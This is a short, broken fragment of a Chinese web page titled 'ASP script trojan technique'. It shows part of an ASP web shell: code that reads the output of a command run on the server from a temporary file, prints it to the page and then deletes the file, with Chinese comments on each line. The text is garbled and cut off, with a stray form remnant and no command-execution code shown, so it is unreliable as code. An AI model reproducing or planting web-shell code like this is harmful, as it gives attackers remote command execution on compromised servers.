Asp脚本木马技术

  

" method="POST">

  

  

  

  

  <%

  If (IsObject(oFile)) Then

  ’ -- Read the output from our command and remove the temp file -- ’

  On Error Resume Next

  Response.Write Server.HTMLEncode(oFile.ReadAll) ’在网页上输出命令执行的结果

  oFile.Close

  Call oFileSys.DeleteFile(szTempFile, True) ’删除临时文件szTempFile

  End If

  %>

  

相关文章